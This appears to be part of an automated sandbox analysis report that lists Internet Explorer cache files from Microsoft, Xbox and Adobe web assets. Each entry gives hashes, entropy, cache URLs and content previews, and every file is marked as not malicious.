                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\facebook-gray[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):675
                                                                                                                                                                                                              Entropy (8bit):5.462138293900793
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:TMHdPhGi/nzVcU3/KYf3nhJ3yNgJoHNWdtGe9SGUCI3L5ZaSNjeH4IEezK+:2dMATLf3G5kdtx9SGsL5ZEZEezK+
                                                                                                                                                                                                              MD5:F7BD2933A7854B8A43D3E3A04D65A184
                                                                                                                                                                                                              SHA1:8D809533E65ADC0B2478E615CAD0AE425A6C2A2B
                                                                                                                                                                                                              SHA-256:FE2A2C856A8E799BA099513E3A0E1CFF1FB6B2DD4A1EA520E26D1AB9F484CB4D
                                                                                                                                                                                                              SHA-512:EDA0D86B245E10819FD7351DE0B10FB6E6A13786F20F3B6001C5FA4003806F4A44FEA7660C94FC160030BECEC512A1EC06397C26344C24BD7497F0777E0350C3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/facebook-gray.svg?version=0b3295fd-6d09-d5a5-af3b-498b3ad72a95
                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 25.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Bold" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 150 150" style="enable-background:new 0 0 150 150;" xml:space="preserve">.<style type="text/css">...st0{fill:#FFFFFF;}...st1{fill:#232020;}.</style>.<rect x="0" class="st0" width="150" height="150"/>.<path class="st1" d="M100.7,24.9h13.7V1.1C112,0.7,103.9,0,94.4,0C74.7,0,61.2,12.4,61.2,35.2v21H39.4v26.7h21.8V150h26.7V82.9h20.9..l3.3-26.7H87.9V37.9C87.9,30.2,89.9,24.9,100.7,24.9L100.7,24.9z"/>.</svg>.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\favicon[2].ico
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):17174
                                                                                                                                                                                                              Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/favicon.ico?v2
                                                                                                                                                                                                              Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\httpErrorPagesScripts[1]
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):8714
                                                                                                                                                                                                              Entropy (8bit):5.312819714818054
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:xmjriGCiOciwd1BtvjrG8tAGGGHmjOWnvyJVUXiki3ayimi5ezxiV:xmjriGCi/i+1Btvjy815HmjqVUXiki3g
                                                                                                                                                                                                              MD5:3F57B781CB3EF114DD0B665151571B7B
                                                                                                                                                                                                              SHA1:CE6A63F996DF3A1CCCB81720E21204B825E0238C
                                                                                                                                                                                                              SHA-256:46E019FA34465F4ED096A9665D1827B54553931AD82E98BE01EDB1DDBC94D3AD
                                                                                                                                                                                                              SHA-512:8CBF4EF582332AE7EA605F910AD6F8A4BC28513482409FA84F08943A72CAC2CF0FA32B6AF4C20C697E1FAC2C5BA16B5A64A23AF0C11EEFBF69625B8F9F90C8FA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                                                                                              Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function expandCollapse(elem,
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\instagram[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):431
                                                                                                                                                                                                              Entropy (8bit):7.099817516184939
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/79GRE8or0js/XPld1uR3v2Alz/Tw0+I:TEvYjs/Pld1w2AlzLw0+I
                                                                                                                                                                                                              MD5:95FD424420005BCBF324E0219845C132
                                                                                                                                                                                                              SHA1:E5F797BC388729F32AFDD7F424487450984B2F25
                                                                                                                                                                                                              SHA-256:97E35ACCD166FFA4D0B84862E2F8C2C36B5B8433D7A20AF382DEE3F104087E77
                                                                                                                                                                                                              SHA-512:1196131B170E7B689BB19C96CB81F4C74830D41B629BEB3957094D4942195D11331B71299A7D80E24549A72308EC0ABBA781DC5349B3B7EA2C44BF8DB1A1AC08
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/439c9edb/coreui.statics/images/social/instagram.png
                                                                                                                                                                                                              Preview: .PNG........IHDR... ... ............tEXtSoftware.Adobe ImageReadyq.e<...QIDATx.b4..d.%`b.1..`.-`....).s..b'...~./.....> .t .j.j$...^.....@...jwQ V.....td.PKE..Ac...x....FZr...d...d..4...O.@.k..2.(....@.w;Z..r."..3..H...G...k....'3.?....4IE......5.....Jr2...0.@..ry...,|HKE......X....0u.....@...Pd....3..O........@)..Js20&b*......@.....JQ'.....hTNE.....W,..'X..M....!...F.(...`.GF.T...-.Q.(..........e.\....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\jquery-1.8.3.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):112392
                                                                                                                                                                                                              Entropy (8bit):5.000853459050592
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:gZIGX/JEkQnA6gOg0s8rehfEtpTxwYgMdjFpsCwQ4c6GWat0OM3FFQW+EUm8bo5A:gLJEAhfEtpTxxgqpgVeD7/fXiJG
                                                                                                                                                                                                              MD5:FE6250B38A40288AF5AFD8E0FAADF4C4
                                                                                                                                                                                                              SHA1:3A4E4CE0DAD3695EB7FE1E6F131D3781AC694F18
                                                                                                                                                                                                              SHA-256:0C65589495B4298AD20877BEEB474116AB2C793C352CB4D0BE793D260C86EC4D
                                                                                                                                                                                                              SHA-512:5D4753D802A260B30766B8C973C504CBA47CE6F0CE0C4600CE28B25FEC7154797FC1E3A80FB47727F53B4DE720A6B043B4FB459C9B75F2E55660FE931A7A042E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.xbox.com/xbcservicewebwww-2104-29112-0-0-main-rolling/shell/js/jquery-1.8.3.min.js
                                                                                                                                                                                                              Preview: ./*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function (e, t) { function _(e) { var t = M[e] = {}; return v.each(e.split(y), function (e, n) { t[n] = !0 }), t } function H(e, n, r) { if (r === t && e.nodeType === 1) { var i = "data-" + n.replace(P, "-$1").toLowerCase(); r = e.getAttribute(i); if (typeof r == "string") { try { r = r === "true" ? !0 : r === "false" ? !1 : r === "null" ? null : +r + "" === r ? +r : D.test(r) ? v.parseJSON(r) : r } catch (s) { } v.data(e, n, r) } else r = t } return r } function B(e) { var t; for (t in e) { if (t === "data" && v.isEmptyObject(e[t])) continue; if (t !== "toJSON") return !1 } return !0 } function et() { return !1 } function tt() { return !0 } function ut(e) { return !e || !e.parentNode || e.parentNode.nodeType === 11 } function at(e, t) { do e = e[t]; while (e && e.nodeType !== 1); return e } function ft(e, t, n) { t = t || 0; if (v.isFunction(t)) return v.grep(e, function (e, r) { var i = !!t.call(e, r, e); return i === n }); if
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\launch-EN7506e353034849faa4a18bc4c20e727c.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):166393
                                                                                                                                                                                                              Entropy (8bit):5.108107312177772
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:zRZO+HsuM2LnmmCNMWyZwjUW+6r1GPG4xArt8Sw8iwwnM:znOvujnmmCNzyZl6r1GPG4xy8Sw9e
                                                                                                                                                                                                              MD5:F361F5A8E7574C552D49C3D25D1259A5
                                                                                                                                                                                                              SHA1:0CC849775221944BCBA5324DE5BFCD01358381F8
                                                                                                                                                                                                              SHA-256:B00DFC6F06D5DE7C7E110EE0EB6516C4D4E74F055A282BAB1306EFAEA6663430
                                                                                                                                                                                                              SHA-512:87BF843BCA18DCDC81EA174CBEF07E568B090E254900ADF2B40C0A07BFCE606AC7AFA7A00AB4E1A4777A8517399FEF3BC744AAB78EB2F30A13E49F22E8C121B7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/launch-EN7506e353034849faa4a18bc4c20e727c.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/launch-EN7506e353034849faa4a18bc4c20e727c.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2021-05-12T10:15:12Z",environment:"production",turbineBuildDate:"2021-04-26T16:54:28Z",turbineVersion:"27.1.3"},dataElements:{"JSLL RedTiger":{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return 0<$("#primaryArea[data-m]").length&&awa.isInitialized}}},MSCC_Consent:{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return!("undefined"!=typeof window.mscc&&"function"==typeof window.mscc.hasConsent&&!window.mscc.hasConsent())}}},"Surface - All Pages":{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return!(!location.pathname.match(/\/..\-..\/surface\/?/gi)||location.pathname.match(/\/..\-..\/surface\/business\/?/gi))}}},"Surface - EN-US
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\legacylayout.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):148712
                                                                                                                                                                                                              Entropy (8bit):5.321245659741262
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:GLc0+oxANuVQWe3CKEmRHnNkiLv7NdZ699Z/c/:GLbPGFpJdIc/
                                                                                                                                                                                                              MD5:AB251D49C1882CC03CC55C61AD94007F
                                                                                                                                                                                                              SHA1:79B0BC901C8B57BEEAACA44FC276ED7004936797
                                                                                                                                                                                                              SHA-256:B2B70CA9B88AA26C9D46902CE7120529D4C8E3F7DB5D8EF0FCF608F7398D5DBD
                                                                                                                                                                                                              SHA-512:2EDE1A84375C5E12DAA863C6B021A82AB0AE158B45097194E0EBF226B2ED414EA9A8A703B1F0E14CED19368DD44F15355B031D508E3B3DE6564A881F6B48FC8E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.xbox.com/xbcservicewebwww-2104-29112-0-0-main-rolling/minified/shell/js/legacylayout.min.js
                                                                                                                                                                                                              Preview: /** vim: et:ts=4:sw=4:sts=4. * @license RequireJS 2.1.15 Copyright (c) 2010-2014, The Dojo Foundation All Rights Reserved.. * Available via the MIT or new BSD license.. * see: http://github.com/jrburke/requirejs for details. */.var requirejs,require,define;(function(n){function l(n){return st.call(n)==="[object Function]"}function a(n){return st.call(n)==="[object Array]"}function f(n,t){if(n)for(var i=0;i<n.length;i+=1)if(n[i]&&t(n[i],i,n))break}function rt(n,t){if(n)for(var i=n.length-1;i>-1;i-=1)if(n[i]&&t(n[i],i,n))break}function r(n,t){return bt.call(n,t)}function i(n,t){return r(n,t)&&n[t]}function h(n,t){for(var i in n)if(r(n,i)&&t(n[i],i))break}function ut(n,t,i,u){return t&&h(t,function(t,f){(i||!r(n,f))&&(!u||typeof t!="object"||!t||a(t)||l(t)||t instanceof RegExp?n[f]=t:(n[f]||(n[f]={}),ut(n[f],t,i,u)))}),n}function u(n,t){return function(){return t.apply(n,arguments)}}function ft(){return document.getElementsByTagName("script")}function at(n){throw n;}function vt(t){if(!t)r
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\meBoot.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):158441
                                                                                                                                                                                                              Entropy (8bit):5.5487164826749975
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:5iJTI1B9EHzBbiiPRJfD51eEGSZzACifqSASP:gJcaBbi2GPCYqSASP
                                                                                                                                                                                                              MD5:075745C8863CD68B5045A3069E2D7B9F
                                                                                                                                                                                                              SHA1:7606871F90B48F3B570B2A3744131CB69A158E4A
                                                                                                                                                                                                              SHA-256:72A3C99D27666F9AC1D757995CCF4DE8C2D1DD5E44DD0641410DB8C0EC51848B
                                                                                                                                                                                                              SHA-512:3A1922ACCE42392C16837067B62F839D6FAE5C533A31687C7CB97D71CAF846CE9A09805AE75BC8FCD4D58928E54F6292B28FFE355D18F694552DA443C29E641F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://mem.gfx.ms/scripts/me/MeControl/10.21123.2/en-US/meBoot.min.js
                                                                                                                                                                                                              Preview: MeControlDefine("meBoot",["exports","@mecontrol/web-inline"],function(t,w){"use strict";var c=function(){},i={},u=[],p=[];function S(t,e){var r,n,o,i,a=p;for(i=arguments.length;2<i--;)u.push(arguments[i]);for(e&&null!=e.children&&(u.length||u.push(e.children),delete e.children);u.length;)if((n=u.pop())&&void 0!==n.pop)for(i=n.length;i--;)u.push(n[i]);else"boolean"==typeof n&&(n=null),(o="function"!=typeof t)&&(null==n?n="":"number"==typeof n?n=String(n):"string"!=typeof n&&(o=!1)),o&&r?a[a.length-1]+=n:a===p?a=[n]:a.push(n),r=o;var s=new c;return s.nodeName=t,s.children=a,s.attributes=null==e?void 0:e,s.key=null==e?void 0:e.key,s}function T(t,e){for(var r in e)t[r]=e[r];return t}function d(t,e){t&&("function"==typeof t?t(e):t.current=e)}var e="function"==typeof Promise?Promise.resolve().then.bind(Promise.resolve()):setTimeout;var l=/acit|ex(?:s|g|n|p|$)|rph|ows|mnc|ntw|ine[ch]|zoo|^ord/i,r=[];function a(t){!t._dirty&&(t._dirty=!0)&&1==r.push(t)&&e(n)}function n(){for(var t;t=r.pop();)t
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\me[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):51639
                                                                                                                                                                                                              Entropy (8bit):5.437440120484484
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:vD7XrUJds35bd8cAJFg7XrUJds35bd8cArcg7XrUJds35bd8cArHg7XrUJds35b5:vw25QMw25Kdw25K6w25KNw25Kv
                                                                                                                                                                                                              MD5:B830E7C8645918E7A54E8600B1F3A299
                                                                                                                                                                                                              SHA1:6B080FBCD51FFC578E4DD479CE6E59D15B436335
                                                                                                                                                                                                              SHA-256:D217EBB6D1E3AE95F4B92FF7E4747871E8687A39CF9596895B7C356BF328075F
                                                                                                                                                                                                              SHA-512:52228F0854F240EC775DD89E454AD0C1FA25E2EC8F55F6EA0044C7F173F75093B2ABE739291FCC105AD10E3EDB590F034B7F412920536FE94DC1F9023BCB26AE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html> ServerInfo: BY1PPF99414E796 2021.04.29.10.43.41 LocVer:0 --> PreprocessInfo: azbldrun:AzBuildW2-Ha13, 2021-04-29T10:39:37.8613138-07:00 - Version: 16,0,29025,2 --> RequestLCID: 1033, Market:EN-US, PrefCountry: US, LangLCID: 1033, LangISO: EN --><html dir="ltr" lang="EN-US"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><base href="https://login.live.com"/><noscript><meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=61e7f1d411224fc27e8b9c7765393243"/>Microsoft account requires JavaScript to sign in. This web browser either does not support JavaScript, or scripts are being blocked.<br /><br />To find out whether your browser supports JavaScript, or to allow scripts, see the browser's online help.</noscript><title>Windows Live ID</title><meta name="robots" content="none" /><meta name="PageID" content=""/><meta name="S
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\meversion[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):27711
                                                                                                                                                                                                              Entropy (8bit):5.241708615240854
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:/8YipPf+462FvZ6QyALeMJyr8ePnVcqMr6tAH6spyo:Bipn+462FvZ1y+Jyr803i6tAH6spyo
                                                                                                                                                                                                              MD5:F80D22F26B7C84D2A58B71991CEDDAAC
                                                                                                                                                                                                              SHA1:29998CD17A183FC2D2699B8C0926738C4B027AC1
                                                                                                                                                                                                              SHA-256:67CFB126CEAACEAFE6C2F533FFF37F9A9779D038166459BAD7A1B2451B60C323
                                                                                                                                                                                                              SHA-512:C705BE90B5D460060A6A1424B1D5DE7496AD7AB3A9F4A5174F0C932D05902651EA18C4614A95CCE0D65247AB51426A77139101FAE36E27D07F9B15591D8C39DA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://mem.gfx.ms/meversion?partner=OfficeProducts&market=de-ch&uhf=1
                                                                                                                                                                                                              Preview: window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.21123.2","mkt":"de-DE","ptn":"officeproducts","gfx":"https://mem.gfx.ms","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graph":false,"aadUrl":"https://myaccount.microsoft.com","msaUrl":"https://account.microsoft.com/"};window.MeControl=window.MeControl||{};window.MeControl.Config={"ver":"10.21123.2","mkt":"de-DE","ptn":"officeproducts","gfx":"https://mem.gfx.ms","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, Tr
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\meversion[2].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):27697
                                                                                                                                                                                                              Entropy (8bit):5.242019681146512
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:3uYipPf+462FvZ6QyALeMJyr8ePnVcqMr6tAH6spyo:zipn+462FvZ1y+Jyr803i6tAH6spyo
                                                                                                                                                                                                              MD5:C08299238D6A062F2DE092454257A900
                                                                                                                                                                                                              SHA1:A4D3EB3C5726EE655DC9CAD1A82539159F026E3F
                                                                                                                                                                                                              SHA-256:E08B37944912AFC358435650213E40B5249989448F180CF0C17B3C3C98CB15F3
                                                                                                                                                                                                              SHA-512:9CBF43CC71796446AF496234AC3FFAC99001DA963EE80D77C563D6939C02721A17FDB792F43E42CE3D3A40D9403CF92B15F255C5CCF1547C6E86E964B3ACA164
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://mem.gfx.ms/meversion?partner=windows&market=en-us&uhf=1
                                                                                                                                                                                                              Preview: window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.21123.2","mkt":"en-US","ptn":"windows","gfx":"https://mem.gfx.ms","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graph":false,"aadUrl":"https://myaccount.microsoft.com","msaUrl":"https://account.microsoft.com/"};window.MeControl=window.MeControl||{};window.MeControl.Config={"ver":"10.21123.2","mkt":"en-US","ptn":"windows","gfx":"https://mem.gfx.ms","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario"
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mscom-grid-mixed[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):143317
                                                                                                                                                                                                              Entropy (8bit):5.038817397019549
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:rz3i3xD5xBXZHMWqyolV2qy0lXK14C3bvcx/zuJ0VVgJl0wqHZq3J2ffrfCfbkpC:XyolV2qy0lXK14C3bvcx/zuJ0VVgJl0a
                                                                                                                                                                                                              MD5:8A8DDFEC472B08925BE8BA81616CD917
                                                                                                                                                                                                              SHA1:26BECF031E1C86F3812B16C295768B0BCB0E95EB
                                                                                                                                                                                                              SHA-256:2743B78020B1AE45E5D8FB8CF68671813D4B5CA021B3FE977AA631D6445C7E9A
                                                                                                                                                                                                              SHA-512:AE7F9D7D98DFA367EB0F370B3DFB4CEC7AE11A625D444FBCE98D09D4C4F48691EB263F983B28A0B9C5A97852CB9853F34078F3D18B31F5307E30E36493E8A33D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.xbox.com/en-us/global-resources/Picchu-Grid/CSS/mscom-grid-mixed.css
                                                                                                                                                                                                              Preview: .ms-grid,[class*=col-]{width:100%;position:relative}a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;font-size:100%;vertical-align:baseline}.ms-grid,.ms-row,[class*=col-]{box-sizing:border-box}.ms-grid{display:block;margin-left:auto;margin-right:auto;max-width:1600px;padding-left:12px;padding-right:12px}.ms-grid.fixed .ms-row,.ms-grid.fixed-small .ms-row{margin-left:-2px;margin-right:-2px}.ms-grid.full{max-width:none;padding-left:0;padding-right:0;width:100%;overflow-x:hidden}.ms-grid.fixed .ms-row>[class*=col-],.ms-grid.fixed-small .ms-row>[class*=col-]{padding-left:2px;padding-right:2px}.ms-grid.fixed-lar
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mwf-west-european-default.min[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):556551
                                                                                                                                                                                                              Entropy (8bit):5.221740865051638
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:rkR57iqbPXlB5UR5vWenR5xWeMFdBjL+ks0EcU0MWEsuWe5fXbHfxlN/FNCn/Lpt:PYz0GKYcw
                                                                                                                                                                                                              MD5:5582719A793D8D70C369645A28698466
                                                                                                                                                                                                              SHA1:F4B2D75F1E55D65CF87DFB3E2A856A7C2D917A45
                                                                                                                                                                                                              SHA-256:301A9A7613FB8A2F5D5A12D5B23949E2B52849402A87FFE4D33DFBD7774C61ED
                                                                                                                                                                                                              SHA-512:AF00AC2F81D371BEC64E580005AB0BF57A0AA5F21E534BBC47A837069CB22B66A43A677F0B0188AB1946AF0AB6BDF4B4176329D40B35545E91D65C9E23F29FEB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.23.1/css/mwf-west-european-default.min.css
